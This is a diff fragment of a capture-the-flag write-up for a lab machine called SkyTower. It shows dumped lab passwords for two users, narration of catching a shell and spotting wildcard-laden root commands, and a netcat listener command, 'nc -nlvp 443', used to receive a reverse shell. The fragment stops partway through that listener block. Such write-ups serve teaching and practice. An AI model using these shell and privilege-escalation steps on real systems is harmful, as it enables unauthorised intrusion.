740i/Writeups/skytower/skytower.md

 2       sara@skytech.com        ihatethisjob
 3       william@skytech.com     senseable
 ```
 Good stuff.
-So William's password doesn't seem to work, but we login as Sara and get booted as usual.
+William's password doesn't seem to work, but we login as Sara and get booted as usual.
 We setup a listener and get a shell like before then notice we can run a couple of commands as root which are configured horribly with wildcard characters.
 ```
 root@kali:~# nc -nlvp 443
 listening on [any] 443 ...